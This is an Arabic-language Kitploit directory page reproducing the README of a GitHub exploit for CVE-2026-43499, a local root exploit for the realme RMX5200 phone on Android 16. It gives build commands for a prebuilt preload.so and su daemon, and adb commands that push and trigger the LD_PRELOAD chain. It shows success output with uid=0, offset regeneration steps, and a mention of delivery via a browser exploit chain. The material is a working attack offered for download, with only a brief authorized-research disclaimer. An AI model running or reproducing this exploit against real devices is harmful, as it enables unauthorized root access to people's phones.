Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-43499-RMX5200 — استغلال رفع الامتيازات المحلي لنظام Android 16 لهاتف realme RMX5200 باستخدام سلسلة preload.so المبنية على LD_PRELOAD لتحقيق وصول جذر مؤقت عبر CVE-2026-43499. | Kitploit
أدوات/GitHubGitHub/sorrow404null/cve-2026-43499-rmx5200
أمان أندرويدتصعيد الامتيازاتأطر الاستغلالالاستغلالشيل كودما بعد الاستغلالأمن الجوالتطوير الحمولاتاستغلال الملفات الثنائية

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubsorrow404null/cve-2026-43499-rmx5200

CVE-2026-43499-RMX5200

استغلال رفع الامتيازات المحلي لنظام Android 16 لهاتف realme RMX5200 باستخدام سلسلة preload.so المبنية على LD_PRELOAD لتحقيق وصول جذر مؤقت عبر CVE-2026-43499.

عرض المستودع
6122منذ شهر واحدلم تتم المراجعة بعد

CVE-2026-43499 لهاتف realme RMX5200

CVE-2026-43499 تصعيد الامتيازات المحلية SO لـ:

العنصرالقيمة
الجهازrealme RMX5200 / RE6030L1
أندرويد16
النواة6.12.23-android16-5-gb2a876903b49-ab14541642-4k
البصمةrealme/RMX5200/RE6030L1:16/BP2A.250605.015/...:user/release-keys

الملف الثنائي المجهز: bin/preload.so

يحتفظ هذا المستودع بهيكل بناء SO فقط (المصادر + الإزاحات + الملف الثنائي المجهز). لا يوجد متصفح مساعد، ولا تفريغات برامج ثابتة، ولا سقالات اختبارية.

مبني على السلسلة العامة IonStack / بأسلوب popsicle; تم إعادة توليد الإزاحات من ملفي boot.img و xbl_config.img لهذا الجهاز.


التخطيط

root@kitploit:~
.
├── bin/preload.so              # prebuilt aarch64 shared object (verified)
├── generate_target.py          # optional: regenerate target.h from boot+xbl
├── source/
│   ├── Makefile
│   └── src/
│       ├── target.h            # RMX5200 offsets
│       ├── main.c preload.c slide.c ...
│       └── kernelsnitch/
└── README.md

البناء

المتطلبات:

  • Android NDK (يوصى بـ r27+)
  • بايثون 3 + llvm-objdump (فقط في حالة إعادة توليد target.h)

باستخدام make

root@kitploit:~
# Linux NDK example
export NDK_ROOT=/path/to/android-ndk
make -C source clean preload

# Windows NDK example
make -C source clean preload \
  NDK_ROOT="/c/Users/YOU/AppData/Local/Android/Sdk/ndk/27.2.12479018" \
  NDK_TOOLCHAIN="/c/Users/YOU/AppData/Local/Android/Sdk/ndk/27.2.12479018/toolchains/llvm/prebuilt/windows-x86_64"

المخرجات:

root@kitploit:~
source/build/bin/preload.so

بدون make (clang مباشر)

root@kitploit:~
cd source
mkdir -p build/bin build/embed
CC="$NDK_TOOLCHAIN/bin/aarch64-linux-android35-clang"

$CC -O2 -Isrc -fPIE -pie -DTARGET_CONFIG_H=\"target.h\" \
  src/su_daemon.c -o build/embed/su_daemon_aarch64_pie

$CC -O2 -Isrc -fPIC -Wno-unused-parameter -Wno-sign-compare -Wno-unused-function \
  -DTARGET_CONFIG_H=\"target.h\" \
  src/main.c src/util.c src/slide.c src/fops.c src/pipe.c \
  src/preload.c src/su_blob.S \
  -shared -o build/bin/preload.so -pthread

إعادة توليد الإزاحات (اختياري)

يتطلب صور برامج ثابتة متطابقة (غير مرفقة هنا):

root@kitploit:~
python3 generate_target.py \
  --boot boot.img \
  --xbl-config xbl_config.img \
  --llvm-objdump llvm-objdump \
  -o source/src/target.h

التشغيل

ADB LD_PRELOAD

root@kitploit:~
adb push bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
adb shell '/data/local/tmp/su -c id'

سلسلة المتصفح (خارجي)

قم بتحميل preload.so هذا عبر مضيف على نمط Firefox-151 lonStack (مثل إدخال جهاز Rootme). غير مضمن في هذا المستودع.

مؤشرات النجاح:

root@kitploit:~
slide-kaslr-ok
direct credential result uid=0 ...
local su binary ready path=/data/local/tmp/su
direct-root-summary root=1 ...
root@kitploit:~
uid=0(root) gid=0(root) ... context=kernel

ملاحظات

  • جذر مؤقت فقط — يُفقد بعد إعادة التشغيل.
  • بعد النجاح، قد تفشل بعض التطبيقات في تهيئة الإطار Framework حتى إعادة التشغيل (نفس فئة الأثر الجانبي للأهداف العامة ذات الصلة).
  • الإزاحات خاصة بالإصدار. إصدارات OTA الأخرى تحتاج إلى target.h جديد / إعادة بناء.
  • لأبحاث الأمن المصرح بها على الأجهزة التي تملكها.

الإسناد

  • سياق البحث العام: كتابات IonStack / CVE-2026-43499
  • سلسلة التنفيذ: سلسلة preload.so بأسلوب popsicle
  • تكييف الجهاز: RMX5200 (RE6030L1)
تنزيل الأداة